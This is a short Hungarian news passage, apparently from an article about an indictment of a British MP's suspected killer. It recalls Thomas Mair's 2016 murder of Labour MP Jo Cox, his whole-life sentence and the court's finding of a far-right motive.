Jo Coxot, a legnagyobb ellenzéki erő, a Munkáspárt kétgyermekes, 41 éves képviselőnőjét 2016. június 16-án, egy héttel a brit EU-tagságról rendezett népszavazás előtt három lövéssel és többtucatnyi késszúrással gyilkolta meg az észak-angliai Leeds egyik elővárosában egy magányos tettes, Thomas Mair, akit még abban az évben tényleges életfogytiglani börtönre ítéltek. Az ítélet indoklása szerint Mair cselekedetét rasszista, újnáci, fehér felsőbbrendűséget hirdető erőszakos eszmék motiválták.

The post Vádat emeltek a brit parlamenti képviselő felételezett gyilkosa ellen appeared first on .